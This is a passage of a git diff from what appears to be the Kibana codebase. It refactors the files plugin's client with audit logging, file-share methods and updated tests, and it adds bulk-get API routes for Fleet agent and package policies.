FileClientImpl( + fileKindDescriptor, + metadataClient, + blobStorageClient, + internalFileShareService, + auditLogger, + logger + ); } + export class FileClientImpl implements FileClient { + private readonly logAuditEvent: AuditLogger['log']; + constructor( private fileKindDescriptor: FileKind, private readonly metadataClient: FileMetadataClient, - private readonly blobStorageClient: BlobStorageClient - ) {} + private readonly blobStorageClient: BlobStorageClient, + private readonly internalFileShareService: undefined | InternalFileShareService, + auditLogger: undefined | AuditLogger, + private readonly logger: Logger + ) { + this.logAuditEvent = (e) => { + if (auditLogger) { + auditLogger.log(e); + } else if (e) { + this.logger.info(JSON.stringify(e.event, null, 2)); + } + }; + } + + private instantiateFile(id: string, metadata: FileMetadata): File { + return new FileImpl( + id, + toJSON(id, { + ...createDefaultFileAttributes(), + ...metadata, + }), + this, + this.logger + ); + } public get fileKind(): string { return this.fileKindDescriptor.id; } - public create = async ({ - id, - metadata, - }: CreateArgs): ReturnType => { - return this.metadataClient.create({ + public async create({ id, metadata }: CreateArgs): Promise> { + const serializedMetadata = serializeJSON({ ...metadata, mimeType: metadata.mime }); + const result = await this.metadataClient.create({ id: id || cuid(), metadata: { + ...createDefaultFileAttributes(), + ...serializedMetadata, + name: serializedMetadata.name!, + extension: + (serializedMetadata.mime_type && mimeType.getExtension(serializedMetadata.mime_type)) ?? + undefined, FileKind: this.fileKind, - ...metadata, }, }); - }; + this.logAuditEvent( + createAuditEvent({ + action: 'create', + message: `Created file "${result.metadata.name}" of kind "${this.fileKind}" and id "${result.id}"`, + }) + ); + return this.instantiateFile(result.id, { + ...result.metadata, + FileKind: this.fileKind, + }) as File; + } - public get: FileMetadataClient['get'] = async (arg) => { - return this.metadataClient.get(arg); - }; + public async get(arg: P1): Promise> { + const { id, metadata } = await this.metadataClient.get(arg); + return this.instantiateFile(id, metadata as FileMetadata); + } - public update: FileMetadataClient['update'] = (arg) => { - return this.metadataClient.update(arg); - }; + public async internalUpdate(id: string, metadata: Partial): Promise { + await this.metadataClient.update({ id, metadata: serializeJSON(metadata) }); + } - public find: FileMetadataClient['find'] = (arg) => { - return this.metadataClient.find(arg); - }; + public async update(id: string, metadata: UpdatableFileMetadata): Promise { + const { alt, meta, name } = metadata; + const payload = { name, alt, meta, updated: moment().toISOString() }; + await this.internalUpdate(id, payload); + } + + public async find(arg: P1): Promise>> { + return this.metadataClient + .find(arg) + .then((r) => + r.map(({ id, metadata }) => this.instantiateFile(id, metadata as FileMetadata)) + ); + } public async delete({ id, hasContent = true }: DeleteArgs) { + if (this.internalFileShareService) { + // Stop sharing this file + await this.internalFileShareService.deleteForFile({ id }); + } if (hasContent) await this.blobStorageClient.delete(id); - return this.metadataClient.delete({ id }); + await this.metadataClient.delete({ id }); + this.logAuditEvent( + createAuditEvent({ + action: 'delete', + outcome: 'success', + message: `Deleted file with "${id}"`, + }) + ); } public deleteContent: BlobStorageClient['delete'] = (arg) => { return this.blobStorageClient.delete(arg); }; - public list: FileMetadataClient['list'] = (arg) => { - return this.metadataClient.list(arg); - }; + public async list(arg?: P1): Promise { + return this.metadataClient + .list(arg) + .then((r) => r.map(({ id, metadata }) => this.instantiateFile(id, metadata))); + } /** * Upload a blob @@ -188,4 +193,45 @@ export class FileClientImpl implements FileClient { public download: BlobStorageClient['download'] = (args) => { return this.blobStorageClient.download(args); }; + + async share({ file, name, validUntil }: ShareArgs): Promise { + if (!this.internalFileShareService) { + throw new Error('#share not implemented'); + } + const shareObject = await this.internalFileShareService.share({ + file, + name, + validUntil, + }); + this.logAuditEvent( + createAuditEvent({ + action: 'create', + message: `Shared file "${file.data.name}" with id "${file.data.id}"`, + }) + ); + return shareObject; + } + + unshare: FileShareServiceStart['delete'] = async (arg) => { + if (!this.internalFileShareService) { + throw new Error('#delete shares is not implemented'); + } + const result = await this.internalFileShareService.delete(arg); + + this.logAuditEvent( + createAuditEvent({ + action: 'delete', + message: `Removed share with id "${arg.id}"`, + }) + ); + + return result; + }; + + listShares: FileShareServiceStart['list'] = (args) => { + if (!this.internalFileShareService) { + throw new Error('#list shares not implemented'); + } + return this.internalFileShareService.list(args); + }; } diff --git a/x-pack/plugins/files/server/file_client/index.ts b/x-pack/plugins/files/server/file_client/index.ts index 2f764a53224e4..cb9c2187bc996 100644 --- a/x-pack/plugins/files/server/file_client/index.ts +++ b/x-pack/plugins/files/server/file_client/index.ts @@ -17,6 +17,12 @@ export type { UpdateMetadataArg, } from './file_metadata_client'; export { FileClientImpl } from './file_client'; -export type { FileClient } from './file_client'; +export type { FileClient } from './types'; export { createEsFileClient } from './create_es_file_client'; export type { CreateEsFileClientArgs } from './create_es_file_client'; +export { + AlreadyDeletedError, + ContentAlreadyUploadedError, + NoDownloadAvailableError, + UploadInProgressError, +} from '../file/errors'; diff --git a/x-pack/plugins/files/server/file_client/integration_tests/es_file_client.test.ts b/x-pack/plugins/files/server/file_client/integration_tests/es_file_client.test.ts index 3ab200533c6da..19abeafa786dc 100644 --- a/x-pack/plugins/files/server/file_client/integration_tests/es_file_client.test.ts +++ b/x-pack/plugins/files/server/file_client/integration_tests/es_file_client.test.ts @@ -8,7 +8,8 @@ import { Readable } from 'stream'; import { loggingSystemMock } from '@kbn/core/server/mocks'; import { TestEnvironmentUtils, setupIntegrationEnvironment } from '../../test_utils'; import { createEsFileClient } from '../create_es_file_client'; -import { FileClient } from '../file_client'; +import { FileClient } from '../types'; +import { FileMetadata } from '../../../common'; /** * This file client is using Elasticsearch interfaces directly to manage files. @@ -17,6 +18,8 @@ describe('ES-index-backed file client', () => { let esClient: TestEnvironmentUtils['esClient']; let fileClient: FileClient; let testHarness: TestEnvironmentUtils; + const blobStorageIndex = '.kibana-test-blob'; + const metadataIndex = '.kibana-test-metadata'; beforeAll(async () => { testHarness = await setupIntegrationEnvironment(); @@ -25,8 +28,8 @@ describe('ES-index-backed file client', () => { beforeEach(() => { fileClient = createEsFileClient({ - blobStorageIndex: '.kibana-test-blob', - metadataIndex: '.kibana-test-metadata', + blobStorageIndex, + metadataIndex, elasticsearchClient: esClient, logger: loggingSystemMock.create().get(), }); @@ -40,64 +43,46 @@ describe('ES-index-backed file client', () => { const file = await fileClient.create({ id: '123', metadata: { - Status: 'AWAITING_UPLOAD', - created: new Date().toISOString(), - Updated: new Date().toISOString(), name: 'cool name', }, }); - expect(file).toEqual( + expect(file.toJSON()).toEqual( expect.objectContaining({ id: '123', - metadata: { - FileKind: 'none', - Status: 'AWAITING_UPLOAD', - Updated: expect.any(String), - created: expect.any(String), - name: 'cool name', - }, + fileKind: 'none', + status: 'AWAITING_UPLOAD', + updated: expect.any(String), + created: expect.any(String), + name: 'cool name', }) ); await fileClient.delete({ id: file.id, hasContent: false }); }); test('uploads and downloads file content', async () => { - let { id, metadata } = await fileClient.create({ + const file = await fileClient.create({ id: '123', metadata: { - Status: 'AWAITING_UPLOAD', - created: new Date().toISOString(), - Updated: new Date().toISOString(), name: 'cool name', }, }); - - const { size } = await fileClient.upload(id, Readable.from([Buffer.from('test')])); - ({ id, metadata } = await fileClient.update({ - id, - metadata: { ...metadata, size, Status: 'READY' }, - })); - - const file = await fileClient.get({ id }); - const rs = await fileClient.download({ id: file.id, size: file.metadata.size }); + await file.uploadContent(Readable.from([Buffer.from('test')])); + const rs = await file.downloadContent(); const chunks: Buffer[] = []; for await (const chunk of rs) { chunks.push(chunk); } expect(Buffer.concat(chunks).toString('utf-8')).toBe('test'); - await fileClient.delete({ id, hasContent: true }); + await fileClient.delete({ id: file.id, hasContent: true }); }); test('searches across files', async () => { const { id: id1 } = await fileClient.create({ id: '123', metadata: { - Status: 'AWAITING_UPLOAD', - created: new Date().toISOString(), - Updated: new Date().toISOString(), name: 'cool name 1', - Meta: { + meta: { test: '1', }, }, @@ -105,28 +90,24 @@ describe('ES-index-backed file client', () => { const { id: id2 } = await fileClient.create({ id: '1234', metadata: { - Status: 'UPLOADING', - created: new Date().toISOString(), - Updated: new Date().toISOString(), name: 'cool name 2', - Meta: { + meta: { test: '2', }, }, }); - const { id: id3 } = await fileClient.create({ + const file3 = await fileClient.create({ id: '12345', metadata: { - Status: 'READY', - created: new Date().toISOString(), - Updated: new Date().toISOString(), name: 'cool name 3', - Meta: { + meta: { test: '3', }, }, }); + await file3.uploadContent(Readable.from(['test'])); + { const results = await fileClient.find({ status: ['READY'], @@ -137,7 +118,7 @@ describe('ES-index-backed file client', () => { expect(results[0]).toEqual( expect.objectContaining({ - id: id3, + id: file3.id, }) ); } @@ -147,7 +128,7 @@ describe('ES-index-backed file client', () => { status: ['READY', 'AWAITING_UPLOAD'], }); - expect(results).toHaveLength(2); + expect(results).toHaveLength(3); expect(results[0]).toEqual( expect.objectContaining({ @@ -157,7 +138,13 @@ describe('ES-index-backed file client', () => { expect(results[1]).toEqual( expect.objectContaining({ - id: id3, + id: id2, + }) + ); + + expect(results[2]).toEqual( + expect.objectContaining({ + id: file3.id, }) ); } @@ -165,7 +152,7 @@ describe('ES-index-backed file client', () => { await Promise.all([ fileClient.delete({ id: id1 }), fileClient.delete({ id: id2 }), - fileClient.delete({ id: id3 }), + fileClient.delete({ id: file3.id }), ]); }); @@ -173,24 +160,23 @@ describe('ES-index-backed file client', () => { const { id: id1 } = await fileClient.create({ id: '123', metadata: { - Status: 'AWAITING_UPLOAD', - created: new Date().toISOString(), - Updated: new Date().toISOString(), name: 'cool name 1', - Meta: { + meta: { test: '1', }, }, }); - const { id: id2 } = await fileClient.create({ - id: '1234', - metadata: { - Status: 'DELETED', - created: new Date().toISOString(), - Updated: new Date().toISOString(), - name: 'cool name 2', - Meta: { - test: '2', + const id2 = '1234'; + await esClient.index<{ file: FileMetadata }>({ + id: id2, + index: metadataIndex, + document: { + file: { + FileKind: 'none', + Status: 'DELETED', + Updated: new Date().toISOString(), + created: new Date().toISOString(), + name: 'coolname', }, }, }); @@ -198,17 +184,15 @@ describe('ES-index-backed file client', () => { const list = await fileClient.list(); expect(list).toHaveLength(1); - expect(list[0]).toEqual( + expect(list[0].toJSON()).toEqual( expect.objectContaining({ id: '123', - metadata: { - FileKind: 'none', - Meta: { test: '1' }, - Status: 'AWAITING_UPLOAD', - Updated: expect.any(String), - created: expect.any(String), - name: 'cool name 1', - }, + fileKind: 'none', + meta: { test: '1' }, + status: 'AWAITING_UPLOAD', + updated: expect.any(String), + created: expect.any(String), + name: 'cool name 1', }) ); diff --git a/x-pack/plugins/files/server/file_client/types.ts b/x-pack/plugins/files/server/file_client/types.ts new file mode 100644 index 0000000000000..bbab0066cf3f0 --- /dev/null +++ b/x-pack/plugins/files/server/file_client/types.ts @@ -0,0 +1,134 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import type { File, FileShareJSONWithToken, UpdatableFileMetadata } from '../../common/types'; +import { CreateFileArgs } from '../file_service'; +import { FileShareServiceStart } from '../file_share_service'; +import { FileMetadataClient } from './file_metadata_client'; + +export type P1 any> = Parameters[0]; + +export interface DeleteArgs { + /** ID of the file to delete */ + id: string; + /** + * If `true`, the file will be deleted from the blob storage. + * + * @default true + */ + hasContent?: boolean; +} + +/** + * Args to create a file + */ +export interface CreateArgs { + /** + * Unique file ID + */ + id?: string; + /** + * The file's metadata + */ + metadata: Omit; +} + +/** + * File share args + */ +export interface ShareArgs { + /** + * Name of the file share + */ + name?: string; + /** + * Unix timestamp (in milliseconds) when the file share will expire + */ + validUntil?: number; + /** + * The file to share + */ + file: File; +} + +/** + * Wraps the {@link FileMetadataClient} and {@link BlobStorageClient} client + * to provide basic file CRUD functionality. + * + * For now this is just a shallow type of the implementation for export purposes. + */ +export interface FileClient { + /** See {@link FileMetadata.FileKind}. */ + fileKind: string; + + /** + * See {@link FileMetadataClient.create}. + * + * @param arg - Arg to create a file. + * */ + create(arg: CreateArgs): Promise>; + + /** + * See {@link FileMetadataClient.get} + * + * @param arg - Argument to get a file + */ + get(arg: P1): Promise>; + + /** + * {@link FileMetadataClient.update} + * + * @param id - File id + * @param metadata - new file metadata + */ + update(id: string, metadata: UpdatableFileMetadata): Promise; + + /** + * Delete a file. + * @param arg - Argument to delete a file + */ + delete(arg: DeleteArgs): Promise; + + /** + * See {@link FileMetadataClient.list} + * + * @param arg - Argument to list files + */ + list(arg?: P1): Promise; + + /** + * See {@link FileMetadataClient.find}. + * + * @param arg - Argument to find files + */ + find: (arg: P1) => Promise; + + /** + * Create a file share instance for this file. + * + * @note this will only work for files that are share capable. + * + * @param args - Arguments to create a file share + */ + share(args: ShareArgs): Promise; + /** + * Create a file share instance for this file. + * + * @note this will only work for files that are share capable. + * + * @param args - Arguments to remove a file share + */ + unshare: FileShareServiceStart['delete']; + /** + * Create a file share instance for this file. + * + * @note this will only work for files that are share capable. + * + * @param arg - Arguments to remove a file share + */ + listShares: FileShareServiceStart['list']; +} diff --git a/x-pack/plugins/files/server/file_client/utils.ts b/x-pack/plugins/files/server/file_client/utils.ts new file mode 100644 index 0000000000000..b8b51117e8ac1 --- /dev/null +++ b/x-pack/plugins/files/server/file_client/utils.ts @@ -0,0 +1,20 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import type { FileMetadata } from '../../common'; + +export function createDefaultFileAttributes(): Pick< + FileMetadata, + 'created' | 'Updated' | 'Status' +> { + const dateString = new Date().toISOString(); + return { + created: dateString, + Status: 'AWAITING_UPLOAD', + Updated: dateString, + }; +} diff --git a/x-pack/plugins/files/server/file_service/file_service.ts b/x-pack/plugins/files/server/file_service/file_service.ts index 90303ac715437..f8d8534b7a635 100644 --- a/x-pack/plugins/files/server/file_service/file_service.ts +++ b/x-pack/plugins/files/server/file_service/file_service.ts @@ -5,7 +5,7 @@ * 2.0. */ -import type { File, FileJSON, FilesMetrics } from '../../common'; +import type { FileJSON, FilesMetrics, File } from '../../common'; import type { FileShareServiceStart } from '../file_share_service/types'; import type { CreateFileArgs, @@ -34,7 +34,7 @@ export interface FileServiceStart { * * @param args - update file args */ - update(args: UpdateFileArgs): Promise>; + update(args: UpdateFileArgs): Promise; /** * Delete a file. diff --git a/x-pack/plugins/files/server/file_service/file_service_factory.ts b/x-pack/plugins/files/server/file_service/file_service_factory.ts index bed007b00e507..b6603a43f8720 100644 --- a/x-pack/plugins/files/server/file_service/file_service_factory.ts +++ b/x-pack/plugins/files/server/file_service/file_service_factory.ts @@ -95,7 +95,7 @@ export class FileServiceFactoryImpl implements FileServiceFactory { return internalFileService.createFile(args) as Promise>; }, async update(args: UpdateFileArgs) { - return internalFileService.updateFile(args) as Promise>; + await internalFileService.updateFile(args); }, async delete(args) { return internalFileService.deleteFile(args); diff --git a/x-pack/plugins/files/server/file_service/internal_file_service.ts b/x-pack/plugins/files/server/file_service/internal_file_service.ts index 567df3e137848..a7ba92db9b2e8 100644 --- a/x-pack/plugins/files/server/file_service/internal_file_service.ts +++ b/x-pack/plugins/files/server/file_service/internal_file_service.ts @@ -23,7 +23,7 @@ import type { GetByIdArgs, ListFilesArgs, } from './file_action_types'; -import { FileClientImpl } from '../file_client/file_client'; +import { createFileClient, FileClientImpl } from '../file_client/file_client'; /** * Service containing methods for working with files. * @@ -42,16 +42,7 @@ export class InternalFileService { ) {} public async createFile(args: CreateFileArgs): Promise { - const fileKind = this.getFileKind(args.fileKind); - return await File.create( - { ...args, fileKind }, - this, - new FileClientImpl( - fileKind, - this.metadataClient, - this.blobStorageService.createBlobStorageClient(fileKind.blobStoreSettings) - ) - ); + return this.createFileClient(args.fileKind).create({ metadata: { ...args } }); } public writeAuditLog(event: AuditEvent) { @@ -79,7 +70,7 @@ export class InternalFileService { if (metadata.Status === 'DELETED') { throw new FileNotFoundError('File has been deleted'); } - return this.toFile(id, metadata, this.getFileKind(metadata.FileKind)); + return this.toFile(id, metadata, metadata.FileKind); } catch (e) { if (SavedObjectsErrorHelpers.isNotFoundError(e)) { throw new FileNotFoundError('File not found'); @@ -91,8 +82,8 @@ export class InternalFileService { public async getById({ fileKind, id }: GetByIdArgs): Promise { const file = await this.get(id); - if (file.fileKind !== fileKind) { - throw new Error(`Unexpected file kind "${file.fileKind}", expected "${fileKind}".`); + if (file.data.fileKind !== fileKind) { + throw new Error(`Unexpected file kind "${file.data.fileKind}", expected "${fileKind}".`); } return file; } @@ -108,28 +99,8 @@ export class InternalFileService { page, perPage, }); - return result.map((file) => this.toFile(file.id, file.metadata, fileKind)); - } - - public toFile( - id: string, - fileMetadata: FileMetadata, - fileKind: FileKind, - fileClient?: FileClientImpl - ): IFile { - return new File( - id, - fileMetadata, - fileClient ?? - new FileClientImpl( - fileKind, - this.metadataClient, - this.blobStorageService.createBlobStorageClient(fileKind.blobStoreSettings) - ), - this, - this.fileShareService, - this.logger.get(`file-${id}`) - ); + const fileClient = this.createFileClient(fileKind.id); + return result.map((file) => this.toFile(file.id, file.metadata, fileKind.id, fileClient)); } public getFileKind(id: string): FileKind { @@ -153,4 +124,32 @@ export class InternalFileService { const { fileId } = await this.fileShareService.getByToken(token); return this.get(fileId); } + + private toFile( + id: string, + fileMetadata: FileMetadata, + fileKind: string, + fileClient?: FileClientImpl + ): IFile { + return new File( + id, + toJSON(id, fileMetadata), + fileClient ?? this.createFileClient(fileKind), + this.logger.get(`file-${id}`) + ); + } + + private createFileClient(fileKindId: string) { + const fileKind = this.fileKindRegistry.get(fileKindId); + return createFileClient({ + auditLogger: this.auditLogger, + blobStorageClient: this.blobStorageService.createBlobStorageClient( + fileKind.blobStoreSettings + ), + fileKindDescriptor: fileKind, + internalFileShareService: this.fileShareService, + logger: this.logger, + metadataClient: this.metadataClient, + }); + } } diff --git a/x-pack/plugins/files/server/file_share_service/internal_file_share_service.ts b/x-pack/plugins/files/server/file_share_service/internal_file_share_service.ts index 7b6f8498b0e3e..6c9e09e5173b4 100644 --- a/x-pack/plugins/files/server/file_share_service/internal_file_share_service.ts +++ b/x-pack/plugins/files/server/file_share_service/internal_file_share_service.ts @@ -85,9 +85,9 @@ export type GetArgs = IdArg; */ export interface DeleteForFileArgs { /** - * The file object to delete the shares for. + * The file id to delete the shares for. */ - file: File; + id: string; } /** @@ -144,7 +144,7 @@ export class InternalFileShareService implements FileShareServiceStart { token: generateShareToken(), }, { - references: [{ name: file.name, id: file.id, type: FILE_SO_TYPE }], + references: [{ name: file.data.name, id: file.data.id, type: FILE_SO_TYPE }], } ); @@ -183,8 +183,8 @@ export class InternalFileShareService implements FileShareServiceStart { return result.saved_objects; } - public async deleteForFile({ file }: DeleteForFileArgs): Promise { - const savedObjects = await this.internalList({ fileId: file.id }); + public async deleteForFile({ id: fileId }: DeleteForFileArgs): Promise { + const savedObjects = await this.internalList({ fileId }); await Promise.all(savedObjects.map(({ id }) => this.delete({ id }))); } diff --git a/x-pack/plugins/files/server/integration_tests/file_service.test.ts b/x-pack/plugins/files/server/integration_tests/file_service.test.ts index 0547fe0ed30fb..61196597cc5f9 100644 --- a/x-pack/plugins/files/server/integration_tests/file_service.test.ts +++ b/x-pack/plugins/files/server/integration_tests/file_service.test.ts @@ -107,9 +107,9 @@ describe('FileService', () => { it('creates file metadata awaiting upload', async () => { const file = await createDisposableFile({ fileKind, name: 'test' }); - expect(file.name).toEqual('test'); - expect(file.fileKind).toEqual(fileKind); - expect(file.status).toBe('AWAITING_UPLOAD' as FileStatus); + expect(file.data.name).toEqual('test'); + expect(file.data.fileKind).toEqual(fileKind); + expect(file.data.status).toBe('AWAITING_UPLOAD' as FileStatus); expect(auditLogger.log).toHaveBeenCalledTimes(1); expect(auditLogger.log).toHaveBeenCalledWith({ error: undefined, @@ -123,9 +123,9 @@ describe('FileService', () => { it('uploads file content', async () => { const file = await createDisposableFile({ fileKind, name: 'test' }); - expect(file.status).toBe('AWAITING_UPLOAD' as FileStatus); + expect(file.data.status).toBe('AWAITING_UPLOAD' as FileStatus); await file.uploadContent(Readable.from(['upload this'])); - expect(file.status).toBe('READY' as FileStatus); + expect(file.data.status).toBe('READY' as FileStatus); const rs = await file.downloadContent(); const chunks: string[] = []; for await (const chunk of rs) { @@ -170,17 +170,17 @@ describe('FileService', () => { meta: { some: 'data' }, }; const updatedFile1 = await file.update(updatableFields); - expect(updatedFile1.meta).toEqual(expect.objectContaining(updatableFields.meta)); - expect(updatedFile1.name).toBe(updatableFields.name); - expect(updatedFile1.alt).toBe(updatableFields.alt); + expect(updatedFile1.data.meta).toEqual(expect.objectContaining(updatableFields.meta)); + expect(updatedFile1.data.name).toBe(updatableFields.name); + expect(updatedFile1.data.alt).toBe(updatableFields.alt); // Fetch the file anew to be doubly sure const updatedFile2 = await fileService.getById({ fileKind, id: file.id }); - expect(updatedFile2.meta).toEqual(expect.objectContaining(updatableFields.meta)); + expect(updatedFile2.data.meta).toEqual(expect.objectContaining(updatableFields.meta)); // Below also tests that our meta type is work as expected by using `some` field. - expect(updatedFile2.meta?.some).toBe(updatableFields.meta.some); - expect(updatedFile2.name).toBe(updatableFields.name); - expect(updatedFile2.alt).toBe(updatableFields.alt); + expect(updatedFile2.data.meta?.some).toBe(updatableFields.meta.some); + expect(updatedFile2.data.name).toBe(updatableFields.name); + expect(updatedFile2.data.alt).toBe(updatableFields.alt); }); it('enforces max size settings', async () => { @@ -339,7 +339,7 @@ describe('FileService', () => { action: 'delete', outcome: 'success', }, - message: expect.stringContaining('Removed share for "myfile"'), + message: expect.stringContaining('Removed share with'), }); }); }); diff --git a/x-pack/plugins/files/server/routes/common.test.ts b/x-pack/plugins/files/server/routes/common.test.ts index cda57b5b6bf13..cc22b0d8afb01 100644 --- a/x-pack/plugins/files/server/routes/common.test.ts +++ b/x-pack/plugins/files/server/routes/common.test.ts @@ -16,7 +16,7 @@ describe('getDownloadHeadersForFile', () => { }; } - const file = { name: 'test', mimeType: undefined } as unknown as File; + const file = { data: { name: 'test', mimeType: undefined } } as unknown as File; test('no mime type and name from file object', () => { expect(getDownloadHeadersForFile(file, undefined)).toEqual( t({ ct: 'application/octet-stream', cd: 'test' }) @@ -34,13 +34,13 @@ describe('getDownloadHeadersForFile', () => { ); }); test('mime type and no name', () => { - const fileWithMime = { ...file, mimeType: 'application/pdf' } as File; + const fileWithMime = { data: { ...file.data, mimeType: 'application/pdf' } } as File; expect(getDownloadHeadersForFile(fileWithMime, undefined)).toEqual( t({ ct: 'application/pdf', cd: 'test' }) ); }); test('mime type and name', () => { - const fileWithMime = { ...file, mimeType: 'application/pdf' } as File; + const fileWithMime = { data: { ...file.data, mimeType: 'application/pdf' } } as File; expect(getDownloadHeadersForFile(fileWithMime, 'a cool file.pdf')).toEqual( t({ ct: 'application/pdf', cd: 'a cool file.pdf' }) ); diff --git a/x-pack/plugins/files/server/routes/common.ts b/x-pack/plugins/files/server/routes/common.ts index 23f702493c92d..f8a3a1965267b 100644 --- a/x-pack/plugins/files/server/routes/common.ts +++ b/x-pack/plugins/files/server/routes/common.ts @@ -11,7 +11,7 @@ import type { File } from '../../common/types'; export function getDownloadHeadersForFile(file: File, fileName?: string): ResponseHeaders { return { 'content-type': - (fileName && mime.getType(fileName)) ?? file.mimeType ?? 'application/octet-stream', + (fileName && mime.getType(fileName)) ?? file.data.mimeType ?? 'application/octet-stream', // Note, this name can be overridden by the client if set via a "download" attribute on the HTML tag. 'content-disposition': `attachment; filename="${fileName || getDownloadedFileName(file)}"`, }; @@ -20,8 +20,8 @@ export function getDownloadHeadersForFile(file: File, fileName?: string): Respon export function getDownloadedFileName(file: File): string { // When creating a file we also calculate the extension so the `file.extension` // check is not really necessary except for type checking. - if (file.mimeType && file.extension) { - return `${file.name}.${file.extension}`; + if (file.data.mimeType && file.data.extension) { + return `${file.data.name}.${file.data.extension}`; } - return file.name; + return file.data.name; } diff --git a/x-pack/plugins/files/server/routes/file_kind/upload.ts b/x-pack/plugins/files/server/routes/file_kind/upload.ts index 7b3db76ad38ad..dc6e8e7f4b268 100644 --- a/x-pack/plugins/files/server/routes/file_kind/upload.ts +++ b/x-pack/plugins/files/server/routes/file_kind/upload.ts @@ -50,7 +50,7 @@ export const handler: FileKindsRequestHandler = async ( } throw e; } - const body: Response = { ok: true, size: file.size! }; + const body: Response = { ok: true, size: file.data.size! }; return res.ok({ body }); }; diff --git a/x-pack/plugins/fleet/common/constants/routes.ts b/x-pack/plugins/fleet/common/constants/routes.ts index d46a5f23ddf08..b415328a303d3 100644 --- a/x-pack/plugins/fleet/common/constants/routes.ts +++ b/x-pack/plugins/fleet/common/constants/routes.ts @@ -49,6 +49,7 @@ export const DATA_STREAM_API_ROUTES = { // Package policy API routes export const PACKAGE_POLICY_API_ROUTES = { LIST_PATTERN: `${PACKAGE_POLICY_API_ROOT}`, + BULK_GET_PATTERN: `${PACKAGE_POLICY_API_ROOT}/_bulk_get`, INFO_PATTERN: `${PACKAGE_POLICY_API_ROOT}/{packagePolicyId}`, CREATE_PATTERN: `${PACKAGE_POLICY_API_ROOT}`, UPDATE_PATTERN: `${PACKAGE_POLICY_API_ROOT}/{packagePolicyId}`, @@ -61,6 +62,7 @@ export const PACKAGE_POLICY_API_ROUTES = { // Agent policy API routes export const AGENT_POLICY_API_ROUTES = { LIST_PATTERN: `${AGENT_POLICY_API_ROOT}`, + BULK_GET_PATTERN: `${AGENT_POLICY_API_ROOT}/_bulk_get`, INFO_PATTERN: `${AGENT_POLICY_API_ROOT}/{agentPolicyId}`, CREATE_PATTERN: `${AGENT_POLICY_API_ROOT}`, UPDATE_PATTERN: `${AGENT_POLICY_API_ROOT}/{agentPolicyId}`, diff --git a/x-pack/plugins/fleet/common/openapi/bundled.json b/x-pack/plugins/fleet/common/openapi/bundled.json index f7d5054f53224..adb49b25782cd 100644 --- a/x-pack/plugins/fleet/common/openapi/bundled.json +++ b/x-pack/plugins/fleet/common/openapi/bundled.json @@ -2215,6 +2215,66 @@ } } }, + "/agent_policies/_bulk_get": { + "post": { + "summary": "Agent policies - Bulk Get", + "tags": [], + "requestBody": { + "content": { + "application/json": { + "schema": { + "type": "object", + "properties": { + "ids": { + "type": "array", + "items": { + "type": "string" + }, + "description": "list of agent policy ids" + }, + "full": { + "type": "boolean", + "description": "get full policies with package policies populated" + }, + "ignoreMissing": { + "type": "boolean" + } + }, + "required": [ + "ids" + ] + } + } + } + }, + "responses": { + "200": { + "description": "OK", + "content": { + "application/json": { + "schema": { + "type": "object", + "properties": { + "items": { + "type": "array", + "items": { + "$ref": "#/components/schemas/agent_policy" + } + } + }, + "required": [ + "items" + ] + } + } + } + } + }, + "operationId": "bulk-get-agent-policies", + "security": [], + "parameters": [] + } + }, "/agent_policies/delete": { "post": { "summary": "Agent policy - Delete", @@ -2706,6 +2766,62 @@ ] } }, + "/package_policies/_bulk_get": { + "post": { + "summary": "Package policies - Bulk Get", + "tags": [], + "requestBody": { + "content": { + "application/json": { + "schema": { + "type": "object", + "properties": { + "ids": { + "type": "array", + "items": { + "type": "string" + }, + "description": "list of package policy ids" + }, + "ignoreMissing": { + "type": "boolean" + } + }, + "required": [ + "ids" + ] + } + } + } + }, + "responses": { + "200": { + "description": "OK", + "content": { + "application/json": { + "schema": { + "type": "object", + "properties": { + "items": { + "type": "array", + "items": { + "$ref": "#/components/schemas/package_policy" + } + } + }, + "required": [ + "items" + ] + } + } + } + } + }, + "operationId": "bulk-get-package-policies", + "security": [], + "parameters": [] + } + }, "/package_policies/delete": { "post": { "summary": "Package policy - Delete", diff --git a/x-pack/plugins/fleet/common/openapi/bundled.yaml b/x-pack/plugins/fleet/common/openapi/bundled.yaml index 60827666ca5e8..3cc16afc3f410 100644 --- a/x-pack/plugins/fleet/common/openapi/bundled.yaml +++ b/x-pack/plugins/fleet/common/openapi/bundled.yaml @@ -1355,6 +1355,45 @@ paths: required: - name description: '' + /agent_policies/_bulk_get: + post: + summary: Agent policies - Bulk Get + tags: [] + requestBody: + content: + application/json: + schema: + type: object + properties: + ids: + type: array + items: + type: string + description: list of agent policy ids + full: + type: boolean + description: get full policies with package policies populated + ignoreMissing: + type: boolean + required: + - ids + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + items: + type: array + items: + $ref: '#/components/schemas/agent_policy' + required: + - items + operationId: bulk-get-agent-policies + security: [] + parameters: [] /agent_policies/delete: post: summary: Agent policy - Delete @@ -1662,6 +1701,42 @@ paths: type: boolean parameters: - $ref: '#/components/parameters/kbn_xsrf' + /package_policies/_bulk_get: + post: + summary: Package policies - Bulk Get + tags: [] + requestBody: + content: + application/json: + schema: + type: object + properties: + ids: + type: array + items: + type: string + description: list of package policy ids + ignoreMissing: + type: boolean + required: + - ids + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + items: + type: array + items: + $ref: '#/components/schemas/package_policy' + required: + - items + operationId: bulk-get-package-policies + security: [] + parameters: [] /package_policies/delete: post: summary: Package policy - Delete diff --git a/x-pack/plugins/fleet/common/openapi/entrypoint.yaml b/x-pack/plugins/fleet/common/openapi/entrypoint.yaml index 316ffa6e5679a..2756656e189f2 100644 --- a/x-pack/plugins/fleet/common/openapi/entrypoint.yaml +++ b/x-pack/plugins/fleet/common/openapi/entrypoint.yaml @@ -82,6 +82,8 @@ paths: $ref: 'paths/agent_policies@{agent_policy_id}.yaml' '/agent_policies/{agentPolicyId}/copy': $ref: 'paths/agent_policies@{agent_policy_id}@copy.yaml' + /agent_policies/_bulk_get: + $ref: paths/agent_policies@_bulk_get.yaml /agent_policies/delete: $ref: paths/agent_policies@delete.yaml # Data streams endpoints @@ -99,6 +101,8 @@ paths: # Package policies endpoints /package_policies: $ref: paths/package_policies.yaml + /package_policies/_bulk_get: + $ref: paths/package_policies@_bulk_get.yaml /package_policies/delete: 